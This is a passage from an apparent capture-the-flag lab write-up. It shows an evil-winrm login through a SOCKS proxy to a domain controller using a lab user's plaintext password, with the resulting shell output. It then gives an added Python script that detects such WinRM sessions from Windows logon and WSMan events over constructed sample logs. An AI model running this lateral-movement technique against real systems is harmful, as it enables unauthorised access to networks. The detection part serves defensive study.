WinRM


The scan result reveals that the dc.cerberus.local host has a WinRM service up and running on port 5985, and that it is reachable from the icinga.cerberus.local host.

Using the credentials of the matthew user, I will attempt to gain a foothold on the DC host, leveraging the established reverse SOCKS proxy.

┌──(kali㉿kali)-[~/archive/htb/labs/cerberus]
└─$ proxychains -q evil-winrm -i 172.16.22.1 -u matthew -p 147258369       
 
Evil-WinRM shell v3.5
warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
 
info: Establishing connection to remote endpoint
*evil-winrm* ps c:\Users\matthew\Documents> whoami
cerberus\matthew
*evil-winrm* ps c:\Users\matthew\Documents> hostname
DC
*evil-winrm* ps c:\Users\matthew\Documents> ipconfig
 
Windows IP Configuration
 
 
ethernet adapter vethernet (switch1):
 
   connection-specific dns suffix  . :
   link-local ipv6 address . . . . . : fe80::e225:edaa:5112:dfc3%6
   ipv4 address. . . . . . . . . . . : 172.16.22.1
   subnet mask . . . . . . . . . . . : 255.255.255.240
   default gateway . . . . . . . . . :
 
ethernet adapter ethernet0 3:
 
   connection-specific dns suffix  . : htb
   ipv6 address. . . . . . . . . . . : dead:beef::138
   ipv6 address. . . . . . . . . . . : dead:beef::c349:4d0f:4db0:880
   link-local ipv6 address . . . . . : fe80::2df8:1fb:a85b:f52d%5
   ipv4 address. . . . . . . . . . . : 10.10.11.205
   subnet mask . . . . . . . . . . . : 255.255.255.0
   default gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%5
                                       10.10.10.2

Lateral movement made to the matthew user on the dc.cerberus.local host via WinRM.
Initial foothold established on the dc.cerberus.local host.
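From the defender's side, the session above is what a WinRM logon to a domain controller from an unexpected internal host looks like in the logs: a network logon (Security event 4624, LogonType 3, typically NTLM when a password is supplied the way evil-winrm does) followed by a WSMan shell being created (Microsoft-Windows-WinRM/Operational event 91). The script below is an added example, not part of this write-up or of any of the tools it uses; it correlates those two events over constructed sample lines and flags shells whose source address is outside an allowlist of management hosts. The key=value rendering of the events, the 60-second correlation window, the address 172.16.22.2 (an assumed neighbour of the DC on the 172.16.22.0/28 vEthernet subnet shown in the ipconfig output) and the 10.10.10.0/24 management allowlist are all assumptions of this example.

```python
"""Flag WinRM (remote PowerShell) shells on a host whose preceding network
logon did not come from an approved management address.

Added example, not part of the original write-up. The log lines below are
constructed, not captured. Event IDs: Security 4624 (logon; LogonType 3 =
network) and Microsoft-Windows-WinRM/Operational 91 (WSMan shell created).
The key=value layout and the User field on event 91 are simplifications
assumed by this example.
"""
import ipaddress
from datetime import datetime, timedelta

# Constructed sample lines. 172.16.22.2 is an assumed host on the DC's
# 172.16.22.0/28 vEthernet subnet; 10.10.10.50 is an assumed admin jump host.
SAMPLE_LOG = """\
ts=2023-05-01T10:00:01Z channel=Security EventID=4624 TargetUserName=matthew TargetDomainName=CERBERUS LogonType=3 AuthenticationPackageName=NTLM IpAddress=172.16.22.2 IpPort=49812
ts=2023-05-01T10:00:02Z channel=Microsoft-Windows-WinRM/Operational EventID=91 ResourceUri=http://schemas.microsoft.com/powershell/Microsoft.PowerShell User=CERBERUS\\matthew
ts=2023-05-01T10:05:00Z channel=Security EventID=4624 TargetUserName=svc_backup TargetDomainName=CERBERUS LogonType=3 AuthenticationPackageName=Kerberos IpAddress=10.10.10.50 IpPort=50011
ts=2023-05-01T10:05:01Z channel=Microsoft-Windows-WinRM/Operational EventID=91 ResourceUri=http://schemas.microsoft.com/powershell/Microsoft.PowerShell User=CERBERUS\\svc_backup
ts=2023-05-01T10:09:00Z channel=Security EventID=4624 TargetUserName=matthew TargetDomainName=CERBERUS LogonType=2 AuthenticationPackageName=Kerberos IpAddress=127.0.0.1 IpPort=0
"""


def parse_line(line):
    """Turn one key=value line into a dict; 'ts' becomes a datetime."""
    fields = dict(tok.split("=", 1) for tok in line.split())
    fields["ts"] = datetime.strptime(fields["ts"], "%Y-%m-%dT%H:%M:%SZ")
    return fields


def flag_winrm_sessions(lines, allowed_sources, window=timedelta(seconds=60)):
    """Return one alert dict per WSMan shell (event 91) whose most recent
    network logon (4624/LogonType 3, same user, within `window`) came from an
    address outside `allowed_sources` (CIDR strings). Lines are assumed to be
    in time order. A shell with no matching recent logon is also reported."""
    nets = [ipaddress.ip_network(n) for n in allowed_sources]
    events = [parse_line(l) for l in lines if l.strip()]
    last_net_logon = {}  # DOMAIN\USER -> most recent network logon event
    alerts = []
    for ev in events:
        if ev.get("EventID") == "4624" and ev.get("LogonType") == "3":
            key = f'{ev["TargetDomainName"]}\\{ev["TargetUserName"]}'.upper()
            last_net_logon[key] = ev
        elif ev.get("EventID") == "91":
            key = ev["User"].upper()
            logon = last_net_logon.get(key)
            if logon is None or ev["ts"] - logon["ts"] > window:
                alerts.append({"user": key, "source": None, "auth": None,
                               "reason": "WSMan shell without recent network logon"})
                continue
            src = ipaddress.ip_address(logon["IpAddress"])
            if not any(src in n for n in nets):
                alerts.append({"user": key, "source": str(src),
                               "auth": logon["AuthenticationPackageName"],
                               "reason": "WinRM shell from non-management host"})
    return alerts


if __name__ == "__main__":
    # Only the management subnet is allowed to open remote shells on the DC.
    for alert in flag_winrm_sessions(SAMPLE_LOG.splitlines(), ["10.10.10.0/24"]):
        print(alert)
```

Run as-is, the script reports one alert: the matthew shell sourced from 172.16.22.2 over NTLM, while the svc_backup shell from the allowed 10.10.10.0/24 range is silent. Widening the allowlist to include 172.16.22.0/28 makes the first one disappear, which is exactly the point of the check: hosts that share an internal segment with the DC (here, the icinga host) are not automatically hosts that should be opening PowerShell sessions on it.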